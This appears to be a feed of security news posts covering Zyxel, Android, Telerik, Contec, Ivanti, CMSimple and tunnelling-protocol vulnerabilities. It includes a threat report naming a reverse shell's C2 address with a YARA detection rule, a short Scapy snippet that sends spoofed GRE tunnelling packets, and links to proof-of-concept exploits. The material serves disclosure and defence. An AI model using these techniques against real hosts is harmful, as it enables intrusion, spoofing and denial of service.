A post-authentication command injection vulnerability in the CGI program of certain legacy DSL CPE models, including VMG1312-B10A, VMG1312-B10B, VMG1312-B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300, and SBG3500, could allow an authenticated attacker to execute operating system (OS) commands on an affected device by sending a crafted HTTP POST request. It is important to note that WAN access is disabled by default on these devices, and this attack can only be successful if user-configured passwords have been compromised.

CVE-2024-40891

UNSUPPORTED WHEN ASSIGNED

A post-authentication command injection vulnerability in the management commands of certain legacy DSL CPE models, including VMG1312-B10A, VMG1312-B10B, VMG1312-B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300, and SBG3500. This vulnerability could allow an authenticated attacker to execute OS commands on an affected device via Telnet. It is important to note that WAN access and the Telnet function are disabled by default on these devices, and this attack can only be successful if the user-configured passwords have been compromised.

CVE-2025-0890

UNSUPPORTED WHEN ASSIGNED

Insecure default credentials for the Telnet function in certain legacy DSL CPE models, including VMG1312-B10A, VMG1312-B10B, VMG1312-B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300, and SBG3500, could allow an attacker to log in to the management interface if the administrators have the option to change the default credentials but fail to do so. It is important to note that WAN access and the Telnet function are disabled by default on these devices. What should you do?

The following models—VMG1312-B10A, VMG1312-B10B, VMG1312-B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300, and SBG3500—are legacy products that have reached EOL status for several years. In accordance with industry product life cycle management practices, Zyxel advises customers to replace these legacy products with newer-generation equipment for optimal protection. If you obtained your Zyxel product through an internet service provider (ISP), please contact the ISP for support. For ISPs, please contact your Zyxel sales or service representatives for further details.

Additionally, disabling remote access and periodically changing passwords are proactive measures that can help prevent potential attacks.

Coordinated Timeline:

2024-07-13: VulnCheck notified Zyxel about vulnerabilities in the EOL CPE VMG4325-B10A without providing any reports.
2024-07-14: Zyxel requested VulnCheck to provide a detailed report; however, VulnCheck did not respond.
2024-07-31: VulnCheck published CVE-2024-40890 and CVE-2024-40891 on their blog without informing Zyxel.
2025-01-28: GreyNoise published CVE-2024-40890 and CVE-2024-40891 on their blog.
2025-01-29: Zyxel received VulnCheck’s report regarding CVE-2024-40890, CVE-2024-40891, and CVE-2025-0890.
2025-01-29: Zyxel became aware of the vulnerabilities in certain legacy DSL CPE models.

Related vulnerabilities: cve-2025-0890 cve-2024-40891 cve-2024-40890

Android Security Bulletin February 2025

1 month ago by Alexandre Dulaunoy

Android Security Bulletin February 2025 Published February 3, 2025

The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2025-02-05 or later address all of these issues. To learn how to check a device's security patch level, see Check and update your Android version.

Android partners are notified of all issues at least a month before publication. Source code patches for these issues have been released to the Android Open Source Project (AOSP) repository and linked from this bulletin. This bulletin also includes links to patches outside of AOSP.

The most severe of these issues is a high security vulnerability in the Framework component that could lead to local escalation of privilege with no additional execution privileges needed. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.

Refer to the Android and Google Play Protect mitigations section for details on the Android security platform protections and Google Play Protect, which improve the security of the Android platform. Android and Google service mitigations

This is a summary of the mitigations provided by the Android security platform and service protections such as Google Play Protect. These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android.

Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible.
The Android security team actively monitors for abuse through Google Play Protect and warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play.

Note: There are indications that CVE-2024-53104 may be under limited, targeted exploitation. 2025-02-01 security patch level vulnerability details

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2025-02-01 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates. Framework

The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed. CVE References Type Severity Updated AOSP versions CVE-2024-49721 A-354682735 EoP High 12, 12L, 13 CVE-2024-49743 A-305695605 [2] [3] EoP High 12, 12L, 13, 14, 15 CVE-2024-49746 A-359179312 [2] EoP High 12, 12L, 13, 14, 15 CVE-2025-0097 A-364037868 EoP High 15 CVE-2025-0098 A-367266072 EoP High 15 CVE-2025-0099 A-370962373 EoP High 15 CVE-2023-40122 A-286235483 ID High 12, 12L, 13, 14, 15 CVE-2023-40133 A-283264674 ID High 12, 12L, 13 CVE-2023-40134 A-283101289 ID High 12, 12L, 13 CVE-2023-40135 A-281848557 ID High 12, 12L, 13 CVE-2023-40136 A-281666022 ID High 12, 12L, 13 CVE-2023-40137 A-281665050 ID High 12, 12L, 13 CVE-2023-40138 A-281534749 ID High 12, 12L, 13 CVE-2023-40139 A-281533566 ID High 12, 12L, 13 CVE-2024-0037 A-292104015 ID High 12, 12L, 13, 14, 15 CVE-2025-0100 A-372670004 ID High 12, 12L, 13, 14, 15 CVE-2024-49741 A-353240784 DoS High 12, 12L, 13, 14, 15 Platform

The vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed. CVE References Type Severity Updated AOSP versions CVE-2025-0094 A-352542820 EoP High 12, 12L, 13, 14, 15 System

The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed. CVE References Type Severity Updated AOSP versions CVE-2025-0091 A-366401629 EoP High 12, 12L, 13, 14, 15 CVE-2025-0095 A-356117796 EoP High 14, 15 CVE-2025-0096 A-356630194 EoP High 15 CVE-2024-49723 A-357870429 [2] ID High 15 CVE-2024-49729 A-368069390 ID High 12, 12L, 13, 14, 15 Google Play system updates

The following issues are included in Project Mainline components. Subcomponent CVE Conscrypt CVE-2024-49723 2025-02-05 security patch level vulnerability details

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2025-02-05 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Kernel

The most severe vulnerability in this section could lead to physical escalation of privilege with no additional execution privileges needed. CVE References Type Severity Subcomponent CVE-2024-53104 A-378455392 Upstream kernel [2] EoP High UVC CVE-2025-0088 A-377672115 Upstream kernel [2] EoP High mremap Arm components

This vulnerability affects Arm components and further details are available directly from Arm. The severity assessment of this issue is provided directly by Arm. CVE References Severity Subcomponent CVE-2025-0015 A-376311652 * High Mali Imagination Technologies

These vulnerabilities affect Imagination Technologies components and further details are available directly from Imagination Technologies. The severity assessment of these issues is provided directly by Imagination Technologies. CVE References Severity Subcomponent CVE-2024-43705 A-372931317 PP-160756* High PowerVR-GPU CVE-2024-46973 A-379728401 PP-160739* High PowerVR-GPU CVE-2024-47892 A-365954523 PP-160576 * High PowerVR-GPU CVE-2024-52935 A-380478495 PP-171230* High PowerVR-GPU MediaTek components

These vulnerabilities affect MediaTek components and further details are available directly from MediaTek. The severity assessment of these issues is provided directly by MediaTek. CVE References Severity Subcomponent CVE-2025-20634 A-381773169 M-MOLY01289384 * High Modem CVE-2024-20141 A-381773173 M-ALPS09291402 * High DA CVE-2024-20142 A-381773175 M-ALPS09291406 * High DA CVE-2025-20635 A-381771695 M-ALPS09403752 * High DA CVE-2025-20636 A-381773171 M-ALPS09403554 * High secmem Unisoc components

This vulnerability affects Unisoc components and further details are available directly from Unisoc. The severity assessment of this issue is provided directly by Unisoc. CVE References Severity Subcomponent CVE-2024-39441 A-381429835 U-2811333 * High Android Qualcomm components

These vulnerabilities affect Qualcomm components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm. CVE References Severity Subcomponent CVE-2024-45569 A-377311993 QC-CR#3852339 Critical WLAN CVE-2024-45571 A-377313069 QC-CR#3834424 High WLAN CVE-2024-45582 A-377312377 QC-CR#3868093 High Camera CVE-2024-49832 A-377312238 QC-CR#3874301 High Camera CVE-2024-49833 A-377312639 QC-CR#3874372 [2] [3] [4] High Camera CVE-2024-49834 A-377312055 QC-CR#3875406 High Camera CVE-2024-49839 A-377311997 QC-CR#3895196 High WLAN CVE-2024-49843 A-377313194 QC-CR#3883522 High Display Qualcomm closed-source components

These vulnerabilities affect Qualcomm closed-source components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm. CVE References Severity Subcomponent CVE-2024-38404 A-357616389 * High Closed-source component CVE-2024-38420 A-357616296 * High Closed-source component Common questions and answers

This section answers common questions that may occur after reading this bulletin.

How do I determine if my device is updated to address these issues?

To learn how to check a device's security patch level, see Check and update your Android version.

Security patch levels of 2025-02-01 or later address all issues associated with the 2025-02-01 security patch level.
Security patch levels of 2025-02-05 or later address all issues associated with the 2025-02-05 security patch level and all previous patch levels.

Device manufacturers that include these updates should set the patch string level to:

[ro.build.version.security_patch]:[2025-02-01]
[ro.build.version.security_patch]:[2025-02-05]

For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2025-02-01 security patch level. Please see this article for more details on how to install security updates.

Why does this bulletin have two security patch levels?

This bulletin has two security patch levels so that Android partners have the flexibility to fix a subset of vulnerabilities that are similar across all Android devices more quickly. Android partners are encouraged to fix all issues in this bulletin and use the latest security patch level.

Devices that use the 2025-02-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins.
Devices that use the security patch level of 2025-02-05 or newer must include all applicable patches in this (and previous) security bulletins.

Partners are encouraged to bundle the fixes for all issues they are addressing in a single update.

What do the entries in the Type column mean?

Entries in the Type column of the vulnerability details table reference the classification of the security vulnerability. Abbreviation Definition RCE Remote code execution EoP Elevation of privilege ID Information disclosure DoS Denial of service N/A Classification not available

What do the entries in the References column mean?

Entries under the References column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs. Prefix Reference A- Android bug ID QC- Qualcomm reference number M- MediaTek reference number N- NVIDIA reference number B- Broadcom reference number U- UNISOC reference number

What does an * next to the Android bug ID in the References column mean?

Issues that are not publicly available have an * next to the corresponding reference ID. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.

Why are security vulnerabilities split between this bulletin and device / partner security bulletins, such as the Pixel bulletin?

Security vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device / partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as Google, Huawei, LGE, Motorola, Nokia, or Samsung.

Threat Actors Use CVE-2019-18935 to Deliver Reverse Shells and…

1 month ago by Alexandre Dulaunoy

From: https://www.esentire.com/blog/threat-actors-use-cve-2019-18935-to-deliver-reverse-shells-and-juicypotatong-privilege-escalation-tool

Threat Actors Use CVE-2019-18935 to Deliver Reverse Shells and…

BY eSentire Threat Response Unit (TRU)

Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.

We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.

Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.

In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.

Here’s the latest from our TRU Team… What did we find?

In early January 2025, the eSentire Threat Response Unit (TRU) identified an unknown threat actor(s) exploiting the now six year old vulnerability, CVE-2019-18935, in Progress Telerik UI for ASP.NET AJAX.

TRU observed threat actor(s) using the w3wp.exe (IIS worker process) to load a reverse shell and run follow up commands for reconnaissance through cmd.exe. Reverse shells were dropped in the C:\Windows\Temp directory matching [10 digits].[6 digits].dll and [10 digits].[7 digits].dll.

The infection process begins when the threat actor(s) send a specific request to the IIS server to determine if the file upload handler is available. This can be seen in IIS logs as shown below:

2025-01-03 10:25:51 10.22.12.20 GET /Telerik.Web.UI.WebResource.axd type=rau 443 - - - 200 0 0 171

After confirming the file upload handler is available and determining the software version is vulnerable, the threat actor(s) made use of a customized version of the PoC here to upload and execute a remote shell.

The reverse shell is simple and is a mixed mode .NET assembly containing a routine that serves to connect to the C2 at 213.136.75[.]130 via Windows Sockets. The legitimate windows binary cmd.exe is started and the input/output/error handles are redirected to threat actor control. Figure 1 – Decompiled reverse shell Figure 1 – Decompiled reverse shell

After the threat actor(s) established connection via the reverse shell, they executed several commands to get information about users on the system. The figure below contains the parent/child relationships and subsequent commands executed through the reverse shell to enumerate users via net.exe and net1.exe. Figure 2 – Remote shell loaded by w3wp.exe IIS worker process leading to recon commands Figure 2 – Remote shell loaded by w3wp.exe IIS worker process leading to recon commands

The following Yara rule can be used for detecting the reverse shell. This Yara rule is also available for download here.

rule TCPReverseShellWindowsx64 { meta: description = "Detects Windows based 64-bit TCP reverse shell" author = "YungBinary" hash = "b971bf43886e3ab1d823477826383dfaee1e2935788226a285c7aebeabee7348" strings: $winsock20 = { 66 B? 02 00 FF 15 } $winsock21 = { 66 B? 02 01 FF 15 } $winsock22 = { 66 B? 02 02 FF 15 } $winsock10 = { 66 B? 01 00 FF 15 } $winsock11 = { 66 B? 01 01 FF 15 }

    $socket_params = { 
        41 B8 06 00 00 00 
        BA 01 00 00 00  
        B9 02 00 00 00  
    } 


    $cmd = { 
        48 C7 44 24 ?? 00 00 00 00 
        48 C7 44 24 ?? 00 00 00 00 
        C7 44 24 ?? 00 00 00 00 
        C7 44 24 ?? (01 | 00) 00 00 00 
        45 33 C9 
        45 33 C0 
        48 8D 15 ?? ?? ?? ?? 
        33 C9 
        FF 15 
    } 

    $wait = { 
        BA FF FF FF FF 
        48 8B 4C ?? ?? 
        FF 15 
    } 

condition: 
    uint16(0) == 0x5a4d and ((1 of ($winsock*)) and $socket_params and $cmd and $wait)

}

Figure 3 – Yara rule to detect Windows TCP reverse shell

TRU also observed the threat actor(s) dropping the open-source privilege escalation tool JuicyPotatoNG on the host under various file names:

C:\Users\Public\PingCaler.exe
C:\Users\Public\JuicyPotatoNG.exe

The following batch files were also dropped on the host but the purpose of these files is not known at this time:

C:\Users\Public\rdp.bat
C:\Users\Public\user.bat
C:\Users\Public\All.bat

The following diagram provided by Telerik can be used to determine if your specific version of Telerik UI for ASP.NET AJAX is vulnerable. Figure 4 – Vulnerable version decision tree diagram, source Figure 4 – Vulnerable version decision tree diagram, source. What did we do?

Our team of 24/7 SOC Cyber Analysts proactively isolated the affected host to contain the infection on the customer’s behalf.
We communicated what happened with the customer and helped them with incident remediation efforts.

What can you learn from this TRU Positive?

While the vulnerability in Progress Telerik UI for ASP.NET AJAX is several years old, it continues to be a viable entry point for threat actors.
This highlights the importance of patching systems, especially if they are going to be exposed to the internet.

Recommendations from the Threat Response Unit (TRU):

Implement a comprehensive vulnerability management service with robust patch management solution and process to ensure systems are up to date with the latest security patches before exposing them to the Internet.
Use an Endpoint Detection and Response (EDR) solution and ensure it is deployed across all workstations and servers.

Indicators of Compromise

You can access the Indicators of Compromise here. References

https://www.esentire.com/security-advisories/active-exploitation-of-cve-2019-18935
https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui
https://www.telerik.com/products/aspnet-ajax/documentation/knowledge-base/common-allows-javascriptserializer-deserialization
https://github.com/noperator/CVE-2019-18935
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-074a
https://github.com/antonioCoco/JuicyPotatoNG

Related vulnerabilities: cve-2019-18935

CISA Releases Fact Sheet Detailing Embedded Backdoor Function of Contec CMS8000 Firmware

1 month ago by Alexandre Dulaunoy

CISA released a fact sheet, Contec CMS8000 Contains a Backdoor, detailing an analysis of three firmware package versions of the Contec CMS8000, a patient monitor used by the U.S. Healthcare and Public Health (HPH) sector. Analysts discovered that an embedded backdoor function with a hard-coded IP address, CWE – 912: Hidden Functionality (CVE-2025-0626), and functionality that enables patient data spillage, CWE – 359: Exposure of Private Personal Information to an Unauthorized Actor (CVE-2025-0683

), exists in all versions analyzed.

Please note the Contec CMS8000 may be re-labeled and sold by resellers. For a list of known re-labeled devices, please refer to FDA’s safety communication, Cybersecurity Vulnerabilities with Certain Patient Monitors from Contec and Epsimed: FDA Safety Communication.

Contec Medical Systems, the company which manufactures this monitor as well as other medical device and healthcare solutions, is headquartered in Qinhuangdao, China. The Contec CMS8000 is used in medical settings across the U.S. and European Union to provide continuous monitoring of a patient’s vital signs—tracking electrocardiogram, heart rate, blood oxygen saturation, non-invasive blood pressure, temperature, and respiration rate. CISA assesses that inclusion of this backdoor in the firmware of the patient monitor can create conditions which may allow remote code execution and device modification with the ability to alter its configuration. This introduces risk to patient safety as a malfunctioning patient monitor could lead to an improper response to patient vital signs.

CISA strongly urges HPH sector organizations review the fact sheet and implement FDA's mitigations. Visit CISA’s Healthcare and Public Health Cybersecurity page to learn more about how to help improve cybersecurity within the HPH sector. For more information and guidance on protection against the most common and impactful threats, tactics, techniques, and procedures, visit CISA’s Cross-Sector Cybersecurity Performance Goals.

Reference

Related vulnerabilities: cve-2025-0683 cve-2025-0626

CISA and FBI Release Advisory on How Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications

2 months ago by Alexandre Dulaunoy

CISA, in partnership with the Federal Bureau of Investigation (FBI), released Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications. This advisory was crafted in response to active exploitation of vulnerabilities—CVE-2024-8963, an administrative bypass vulnerability; CVE-2024-9379, a SQL injection vulnerability; and CVE-2024-8190 and CVE-2024-9380, remote code execution vulnerabilities—in Ivanti Cloud Service Appliances (CSA) in September 2024.

CISA, and the use of trusted third-party incident response data, found that threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks.

CISA and FBI strongly encourage network administrators and defenders to upgrade to the latest supported version of Ivanti CSA and to hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) provided in the advisory. All members of the cybersecurity community are also encouraged to visit CISA’s Known Exploited Vulnerabilities Catalog to help better manage vulnerabilities and keep pace with threat activity. For more information and guidance on protection against the most common and impactful threats, tactics, techniques, and procedures, visit CISA’s Cross-Sector Cybersecurity Performance Goals.

Ref: https://www.cisa.gov/news-events/alerts/2025/01/22/cisa-and-fbi-release-advisory-how-threat-actors-chained-vulnerabilities-ivanti-cloud-service

Related vulnerabilities: cve-2024-8963 cve-2024-9379 cve-2024-9380 cve-2024-8190

CMSimple 5.16 vulnerabilities leading to RCE

2 months ago by Cédric Bonhomme

Vulnerabilities in CMSimple 5.16 leading to RCE

CVE-2024-57546 - An issue in CMSimple v.5.16 allows a remote attacker to obtain sensitive information via a crafted script to the validate link function.
CVE-2024-57547 - Insecure Permissions vulnerability in CMSimple v.5.16 allows a remote attacker to obtain sensitive information via a crafted script to the Functionality of downloading php backup files.
CVE-2024-57548 - CMSimple 5.16 allows the user to edit log.php file via print page.
CVE-2024-57549 - CMSimple 5.16 allows the user to read cms source code through manipulation of the file name in the file parameter of a GET request.

Original research

https://github.com/h4ckr4v3n/cmsimple5.16_research

Related vulnerabilities: cve-2024-57546 cve-2024-57547 cve-2024-57549 cve-2024-57548

A triple-exploit chain. auth bypass (1) to exposed dbus interface (2) to command injection (3) (from @da_667@infosec.exchange)

2 months ago by Cédric Bonhomme

A triple-exploit chain. auth bypass (1) to exposed dbus interface (2) to command injection (3): https://www.exploit-db.com/exploits/45100

Related vulnerabilities: cve-2018-10660 cve-2018-10662 cve-2018-10661

Unit42 Threat Brief: CVE-2025-0282 and CVE-2025-0283

2 months ago by Alexandre Dulaunoy

On Jan. 8, 2025, Ivanti released a security advisory for two vulnerabilities (CVE-2025-0282 and CVE-2025-0283) in its Connect Secure, Policy Secure and ZTA gateway products. This threat brief provides attack details that we observed in a recent incident response engagement to provide actionable intelligence to the community. These details can be used to further detect current attacks noted in the wild using CVE-2025-0282.

These Ivanti products are all appliances that facilitate remote connections into a network. As such, they are outward-facing assets that attackers could target to infiltrate a network.

CVE-2025-0282 is a stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2 and Ivanti Neurons for ZTA gateways before version 22.7R2.3 that allows a remote unauthenticated attacker to achieve remote code execution. This vulnerability has been assigned a critical CVSS score of 9.0.

CVE-2025-0283 is a stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2 and Ivanti Neurons for ZTA gateways before version 22.7R2.3 that allows a local authenticated attacker to escalate their privileges. This vulnerability has been assigned a high CVSS score of 7.0.

On the same day of Ivanti’s advisory, Mandiant disclosed its findings of attacks in the wild using the CVE-2025-0282 remote code execution vulnerability.

On January 10, Watchtowr Labs also provided analysis of the exploited vulnerability. On January 12, Watchtowr provided a walkthrough and on January 16 they published a proof of concept (PoC).

For more info https://unit42.paloaltonetworks.com/threat-brief-ivanti-cve-2025-0282-cve-2025-0283/

Related vulnerabilities: cve-2025-0283 cve-2025-0282

Haunted by Legacy: Discovering and Exploiting Vulnerable Tunnelling Hosts

2 months ago by Alexandre Dulaunoy

Ref: https://github.com/vanhoefm/tunneltester/blob/main/README.md

Haunted by Legacy: Discovering and Exploiting Vulnerable Tunnelling Hosts

1. Introduction

This repository will contain scripts to test whether hosts/servers accept unauthenticated tunneling packets. In particular, it can test whether a host accepts IPIP, IP6IP6, GRE, GRE6, 4in6, and 6in4 packets using various scanning methods. A high-level description of the resulting attacks can be found below, and a detailed description and evaluation of all attacks can be found in our USENIX Security '25 paper.

NOTE: To prevent abuse, this scanning script is not yet publicly available. Only the README of the script is available. Please contact Angelos Beitis and Mathy Vanhoef to get access to the actual scanning scripts. We can also provide Z-Map modules to scan multiple hosts at once.

For advice on how to mitigate the resulting attacks, see Section 6 in our paper.

The vulnerabilities were reported to CERT/CC on May 16, 2024, and are being tracked using the identifier VU#199397 and using the CVE identifiers described below. We have also collaborated with the Shadowserver Foundation to better reach affected organizations, and they are now performing periodic scans for vulnerable tunneling hosts.

2. Vulnerability Summary

Attack Overview

We found that many Internet hosts accept unauthenticated IPIP, IP6IP6, GRE, 6in4, or 4in6 tunneling packets from an arbitrary source. This means an adversary can send a tunneling packet to such vulnerable hosts, and the vulnerable host will process the encapsulated inner packet, without authenticating (the source of) the tunneling packet. An adversary can abuse this to perform Denail-of-Service attacks, to spoof their source IP address, and possibly to gain access to an organization's private or local network.

An example attack, written using the Python Scapy library, is:

from scapy.all import *
inner_packet = IP(src="1.1.1.1", dst="8.8.8.8")/ICMP()
vulnerable_host = "1.0.0.1"
send(IP(dst=vulnerable_host)/GRE()/inner_packet)

The vulnerable host at 1.0.0.1 will receive the IP/GRE packet and then process and forward the inner IP packet to its destination. More worrisome, many vulnerable hosts will perform no sanity checks on the inner packet. This means many vulnerable hosts can be abused to spoof the source IP addresses of packets. As shown in the above example, the forwarded packet can have the IP address 1.1.1.1, even though the real IP address of the vulnerable host is 1.0.0.1. This means an ICMP packet will be sent to 8.8.8.8 with as spoofed source address 1.1.1.1. Similar attacks are possible against IPv4 and IPv6 hosts using the protocols IPIP, IP6IP, GRE6, 6in4, or 4in6. Note that we use 'host' as a synonym for an IPv4 or IPv6 address and that we will use 'GRE6' when GRE packets are sent between IPv6 hosts.

2.1 Scanning Methods

To detect vulnerable hosts, we scanned the IPv4 and IPv6 Internet using three main methods. These methods are further explained in the indicated sections of our paper:

Standard Scan (Section 3.2.1): In this scan, the inner packet is an ICMP ping reply with as source IP address the vulnerable host and as destination our scanning server. We also did a subnet spoofing variant of this scan, where the inner packet has as source an IP address within the same subnet as the host. Additionally, we did a spoofing variant, where the inner packet has a spoofed source IP address that is outside the subnet of the host.
ICMP Echo/Reply (Ping) Scan (Section 3.2.2): In this scan, the inner packet is an ICMP ping request with as destination the vulnerable host itself and as source address our scanning server. In case the host is vulnerable, it will process the ping request, and send a ping reply to our scanning server.
Time Exceeded (TTL) Scan (Section 3.2.3): In this scan, the inner packet is an IP packet with a Time-To-Live (TTL) equal to one, or an IPv6 packet with a Hop Limit equal to zero. This inner packet has as source address our scanning server, and has as destination address a random public IP address. If the host tries to forward this packet, and hence is vulnerable, it will generate an ICMPv4 or ICMPv6 Time Exceeded packet towards our scanning server.

For the 4in6 scans, where we send a tunneling packet to an IPv6 host with as inner packet an IPv4 packet, we cannot perform a ping scan because we do not know the IPv4 address of the IPv6 host being scanner. This also implies we can only do the spoofing variant of the standard scan, because we do not know the IPv4 subnet of the host.

For the 6in4 scans, where we send a tunneling packet to an IPv4 host with as inner packet an IPv6 packet, we can use the IPv4-Mapped IPv6 Address of the form ffff:IPV4_ADDRESS_IN_HEX:: to perform the standard and ping scans.

2.2 Impact Summary

Denial-of-Service: An attack that is always possible is a Denial-of-Service attack by recursively encapsulating tunneling packets and sending this constructed packet to a vulnerable host. The vulnerable host will then recursively keep processing the encapsulated tunneling packets until the last nested packet is reached. This implies that sending a single packet will result in substantial processing time on the vulnerable host. In terms of CPU usage on the vulnerable host, this can result in an amplification factor of 70x when performing a DoS attack, and even higher when combined with IP fragmentation. Depending on the behaviour of the vulnerable tunneling host, other DoS attacks may also be possible, such as a Tunneled-Temporal Lensing Attack or Economic DoS attack. See our draft paper for details.
Source Address Spoofing: An adversary can abuse vulnerable tunneling hosts to spoof their source IP address. This is because the vulnerable tunneling host will forward IP packets on behalf of the attacker. A host can spoof source IP addresses when the Standard "subnet spoof" and "spoof" scans indicate that the server is vulnerable.
Internal Network Access: In case the vulnerable host is connected to a private network, then the open tunneling host can possibly be abused to gain access to all devices within this connected private network. This may particularly be possible if the vulnerable hosts also implement Network Address Translation (NAT). The precise details of this are still being investigated.

2.3 Assigned CVE Identifiers

CVE-2020-10136: IPv4-in-IPv4 (IPIP) protocol (RFC2003).
CVE-2024-7595: GRE and GRE6 (RFC2784).
CVE-2024-7596: Generic UDP Encapsulation (GUE) (IETF Draft). We did not detect any vulnerable hosts using this draft protocol.
CVE-2025-23018: IPv4-in-IPv6 (4in6) and IPv6-in-IPv6 (IP6IP6) protocols (RFC2473).
CVE-2025-23019: IPv6-in-IPv4 (6in4) protocol (RFC4213).

3. Tool Prerequisites

You can execute the following commands to initialize the Python environment to execute the script. We tested these commands on Ubuntu 24.04:

python3 -m venv venv
source venv/bin/activate
pip install wheel scapy==2.4.3

You can then load this Python environment as root and execute the script:

sudo su
source venv/bin/activate
./tunnel_tester.py

4. Steps to Reproduce

After the prerequisite steps, you can execute the following command to test IPv4-capable hosts:

./tunnel_tester.py eth0 -t 183.232.161.42

The parameters are:

-i eth0: The interface that should be used to send and receive the packets. It must have an IPv4 address, otherwise, no tests are performed.
-t 183.232.161.42: This is the IPv4 address of the host being tested.

You can test IPv6-capable hosts using the following command:

./tunnel_tester.py eth0 -t6 2a00::1000

The parameters are:

-i eth0: The interface that should be used to send and receive the packets. It must have an IPv6 address, otherwise, no tests are performed.
-t6 2a00::1001: This is the IPv6 address of the host being tested.

The IPv4 and IPv6 tests can also be performed in a single execution:

./tunnel_tester.py -t 183.232.161.42 -t6 2a00::1001

For each performed test, the script will output SAFE if no vulnerability was detected, and VULNERABLE if a vulnerability was detected. Note that we recommend executing the script multiple times, since sometimes replies may get lost. You can also increase or decrease how long the script waits for replies using the --timeout parameter. For instance, by specifying --timeout 0.5 the script will only wait half a second for replies.

5. Advanced Usage

By default, the script will use the IP address associated to the given interface as the source address in transmitted packets. To use a different source address, or explicitly set the IP address in case it does not get detected properly, you can use:

-P A.A.A.A: The IPv4 to use as source address in outgoing IP packets.
-P6 2a00::1000: The IPv6 to use as source address in outgoing IP packets.

By default, the script will try to spoof IP addresses belonging to KU Leuven University in the standard spoof scan. To try to spoof a different source IP address you can use the following arguments:

-s 212.224.129.90: Test whether the vulnerable host has the ability to spoof the given source IPv4 addresses.
-s6 2a02:2c40:0:80::80:15: Test whether the vulnerable host has the ability to spoof the given source IPv6 addresses.

In the Time Expired TTL scans, the inner IP addresses by default belong to KU Leuven University. To use a different inner destination IP address, in order to trigger packet forward and generate the TTL Expired error, you can use the following arguments:

-t 212.224.129.90: Test whether the vulnerable host has the ability to spoof the given source IPv4 addresses.
-t6 2a02:2c40:0:80::80:15: Test whether the vulnerable host has the ability to spoof the given source IPv6 addresses.

When running the script on an AWS EC2 server, you need to explicitly provide the private and public IP address of the server using the following arguments:

-p 172.0.0.1: The private IPv4 address of the scanning server.
-P 1.2.3.4: The public IPv4 address of the scanning server.

6. Troubleshooting

Ensure you are injecting packets on the correct interface!
When you are testing your own vulnerable server, ensure that the accept_local and ip_forwarding sysctl's for both IPv4/6 are set. Otherwise the host may not be vulnerable to (all) attacks.
With tcpdump you can use the filter "proto 4 or proto gre or proto 41" to capture the packets that the scanning tool is transmitting (this will not show possible replies).

Additional feedback

https://infosec.exchange/@jeroen@secluded.ch/113831359550444599 that is only 20 years after http://www.dia.uniroma3.it/~compunet/tunneldiscovery/ and there are other similar papers that wrote this up. It is the full intent and purpose on how those protocols are supposed to be used, and spoofing is a network issue in this case (they rely on a trusted network... ouch). Source Address Validation is one solution, not using non-authenticated protocols another.

Related vulnerabilities: cve-2025-23019 cve-2020-10136 cve-2025-23018 cve-2024-7596 cve-2024-7595

RSYNC: 6 vulnerabilities

2 months ago by Alexandre Dulaunoy

6 vulnerabilities in rsync server

